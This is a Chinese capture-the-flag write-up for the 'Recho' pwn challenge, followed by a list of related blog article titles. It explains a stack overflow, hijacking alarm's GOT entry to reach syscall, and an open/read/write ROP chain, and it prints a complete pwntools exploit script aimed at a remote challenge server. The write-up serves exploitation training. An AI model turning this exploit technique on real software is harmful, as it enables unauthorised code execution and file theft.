0x00 考察点

考察点有三个:

  1. ROP链构造
  2. Got表劫持
  3. pwntools的shutdown功能

0x01 程序分析

上来三板斧

  • file一下

  • checksec --file XXX

  • chmod 777 XXX加上./XXX 运行一下

静态调试

打开IDA-64,一路默认,看到main函数:



可以看到执行的功能是先输入字符串长度,然后输入字符串,接着会返回指定长度的输入字符串。如果一开始输入的数字小于16,会指定长度为16。可以看到很明显的栈溢出漏洞。但是又有些不一样,看大神WP才知道需要shutdown('send')跳出循环才可以。

0x02 漏洞在哪里?

这个题目有个明显后门,在IDA中shift+f12查看程序中的字符串,发现有flag。可以将它read到bss段中,再通过write输出出来



在gdb动态调试时,分析alarm,发现有

disassemble alarm

0x03 利用思路

漏洞利用思路如下:

  1. alrm函数got表劫持到syscall位置
  2. open('flag',READONLY)
  3. 通过read将flag写入到bss段,之后再write输出

    ROP链条:

    syscall>>flag>>read>>write

    ROP地址



0x04 EXP脚本

exp代码如下:

from pwn import *

# io = process('./Recho')

io = remote('111.198.29.45',41375)

elf = ELF('./Recho')

context.log_level = 'debug'

pop_rdi = 0x4008a3

pop_rdx = 0x4006fe

pop_rax = 0x4006fc

pop_rsi_r15 = 0x4008a1

rdi_add = 0x40070d

flag_addr = elf.symbols['flag']

read_got = elf.got['read']

# bss = 0x601090

bss = elf.bss()  #两者都可以

read_plt = elf.plt['read']

write_plt = elf.plt['write']

alarm_got = elf.got['alarm']

alarm_plt = elf.plt['alarm']

print 'flag: ',hex(flag_addr)

payload = 'A'*0x30  #覆盖buf[40]; // [rsp+10h] [rbp-30h]

payload +='A'*0x08 #覆盖 rbp

#alarm GOT表劫持到syscall位置

payload += p64(pop_rax)+p64(0x5)

payload += p64(pop_rdi)+p64(alarm_got)

payload += p64(rdi_add)

# -------fd=open('flag',READONLY)-----

payload += p64(pop_rdi)+p64(flag_addr)  #rdi='flag

payload += p64(pop_rsi_r15)+p64(0)+p64(0) #rsi=0(READONLY)

payload += p64(pop_rdx)+p64(0) # rdx = 0

payload += p64(pop_rax)+p64(0x2) # rax=2,open的调用号为2

# 执行alarm完成GOT表劫持,syscall的传参顺序是rdi,rsi,rdx,r10,r9,r8

payload += p64(alarm_plt)

# 将flag传回的值写入到bss段 read(fd,stdin_buffer,100)

payload += p64(pop_rdi)+p64(3) #open()打开文件返回的文件描述符一般从3开始,系统环境不一样也可能不是3,依次顺序增加

payload += p64(pop_rdx)+p64(0x2d) #指定长度

payload += p64(pop_rsi_r15)+p64(bss)+p64(0) # rsi =写入的地址,用于存取open结果

payload += p64(read_plt)

#输出flag值,write(1,bss,0x40),也可以用print函数

payload += p64(pop_rsi_r15)+p64(bss)+p64(0)

payload += p64(pop_rdx)+p64(0x40)

payload += p64(pop_rdi)+p64(0x01)

payload += p64(write_plt)

# 用printf 函数时,要注意bss段的可写性,bss此时应改为0x601090或者0x601070

#payload+=p64(pop_rdi)+p64(bss)+p64(printf_plt)  

io.sendline(str(0x200))

# log.info('the length of payload is:',format(hex(len(payload))))

print 'the length of payload is:',format(hex(len(payload)))

payload = payload.ljust(0x200,'\x00')

io.send(payload)

io.recv()

io.shutdown('send')

io.interactive()

0x05 知识点

  1. 函数参数传递顺序

    当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9

  2. shutdown('send')跳出函数无线循环

  3. rax寄存器在构造exp中,可用于劫持got表,调用系统序号函数。

推荐阅读

  1. 攻防世界题目中的WP(https://adworld.xctf.org.cn/media/uploads/writeup/4b6e244402fe11ea9f5700163e004e93.pdf)
  2. 64位汇编参数传递

【攻防世界】 高手进阶区 Recho WP的更多相关文章

  1. 攻防世界 高手进阶区 web cat

    php cURL CURLOPT_SAFE_UPLOAD django DEBUG mode Django使用的是gbk编码,超过%F7的编码不在gbk中有意义 当 CURLOPT_SAFE_UPLO ...

  2. 攻防世界_MISC进阶区_Get-the-key.txt(详细)

    攻防世界MISC进阶之Get-the-key.txt 啥话也不说,咱们直接看题吧! 首先下载附件看到一个压缩包: 我们直接解压,看到一个文件,也没有后缀名,先用 file 看一下文件属性: 发现是是L ...

  3. 攻防世界 web进阶区 ics-06

    攻防世界 ics-06 涉及知识点: (1)php://filter协议 (2)php中preg_replace()函数的漏洞 解析: 进入题目的界面,一通乱点点出了唯一一个可以进入的界面. 观察ur ...

  4. 攻防世界高手进阶之Web_python_block_chain(2018年DDCTFmini blockchain)

    打开题目大概看了一下,是有关区块链的题目, 感觉代码要格式化一下,不然没法看 代码格式化站点:https://www.html.cn/tool/js_beautify/ hash of genesis ...

  5. 攻防世界MISC进阶区 52-55

    52.Excaliflag 得到一张png,扔进stegsolve中查看,找到flag 53.Just-No-One 得到一个exe,运行后居然是一个安装程序,看了一下没什么问题,扔进ida pro中 ...

  6. 攻防世界MISC—进阶区21-30

    21.easycap 得到一个pcap文件,协议分级统计,发现都是TCP协议 直接追踪tcp流,得到FLAG 22.reverseMe 得到一张镜面翻转的flag,放入PS中,图像-图像旋转-水平翻转 ...

  7. 攻防世界 web 进阶区 刷题记录

    1.Training-WWW-Robots 题目提示了robots协议,直接访问robots.txt 继续访问fl0g.php 2.baby_web 题目描述:想想初始页面是哪个 百度搜了下,inde ...

  8. 攻防世界web进阶区(2)--记一次sql注入

    题目地址:http://111.198.29.45:56094 这是一道sql注入题. 试试1' order by 3#,发现页面显示正常,将3换为4时,页面报错,则说明含有3个字段. 接下来判断输出 ...

  9. 攻防世界web进阶区(1)

    1.题目地址:http://111.198.29.45:43589 页面提示打开robots文件,则: 页面有提示输入fl0g.php,那么 获取flag. 2.题目地址:http://111.198 ...

随机推荐

  1. Win Oracle 监听文件配置参考

    Win lister.ora配置参考 # listener.ora Network Configuration File: C:\app\Administrator\product\\dbhome_1 ...

  2. 4_2 刽子手游戏(UVa489)<自顶向下逐步求精法>

    Hangman Judge是一个猜英文单字的小游戏(在电子字典中常会看到),游戏规则如下:1.答案单字写在纸上(每个字元一张纸),并且被盖起来,玩家每次猜一个英文字元(letter).2.如果这个英文 ...

  3. Mysql安装 ----> 基于源码包安装

    1)基于源码包安装MySQL [root@localhost ~]# rpm -q mysql mysql-server mariadb mairadb-server           //检查有没 ...

  4. php 微信小程序支付

    php 微信小程序支付 直接贴代码: 前端测试按钮wxml: <view class="container"> <text class="name&qu ...

  5. [转]利用 Commons-Fileupload 实现文件上传

    转载 Java Web开发人员可以使用Apache文件上传组件来接收浏览器上传的文件,该组件由多个类共同组成,但是,对于使用该组件来编写文件上传功能的Java Web开发人员来说,只需要了解和使用其中 ...

  6. Spring源码试读--BeanFactory模拟实现

    动机 现在Springboot越来越便捷,如果简单的Spring应用,已无需再配置xml文件,基本可以实现全注解,即使是SpringCloud的那套东西,也都可以通过yaml配置完成.最近一年一直在用 ...

  7. C#操作Word的超详细总结 ---转载

    C#操作Word的超详细总结 本文中用C#来操作Word,包括: 创建Word: 插入文字,选择文字,编辑文字的字号.粗细.颜色.下划线等: 设置段落的首行缩进.行距: 设置页面页边距和纸张大小: 设 ...

  8. c数据结构线性表的总结

    1:连表的特点   1.链表是一种存储结构,用于存放线性表   2.连表的结点是根据需要调用动态分配内存函数进行分配的,因此链表可随需要伸长缩短      在腰存储的数据个数未知的情况下节省内存.   ...

  9. iOS 批量上传图片的 3 种方法

    AFNetworking 在去年年底升级到了 3.0.这个版本更新想必有很多好处,然而让我吃惊的是,它并没有 batch request 接口.之前的 1.x 版本.2.x 版本都实现了这个很常见的需 ...

  10. MyEclipse和Eclipse中常用的快捷键

    ##########################快捷键分类速查##########################     *******常用类********[Ctrl+O]   显示类中方法和 ...